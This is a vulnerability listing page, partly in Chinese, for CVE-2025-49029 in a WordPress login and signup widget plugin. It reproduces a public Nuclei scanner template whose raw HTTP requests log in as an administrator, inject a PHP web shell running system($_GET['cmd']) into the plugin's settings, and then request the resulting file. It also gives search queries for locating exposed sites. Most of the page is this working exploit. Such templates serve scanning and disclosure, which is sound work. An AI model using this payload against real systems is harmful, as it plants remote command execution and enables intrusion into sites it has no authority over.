CVE-2025-49029: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution

日期: 2025-08-01 | 影响软件: WordPress Custom Login And Signup Widget Plugin | POC: 已公开

漏洞描述

Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0

PoC代码[已公开]

id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
  classification:
    epss-score: 0.00268
    epss-percentile: 0.50173
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
    fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and
# digest: 490a0046304402206919f31c78e11bf0d69283ba6f91935018d94ad73a4fb31888af83822315492302204202b97520465879d0295d95ee6e69f211c8664d92d0600f6ad85d6d5abd87dd:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-49029.yaml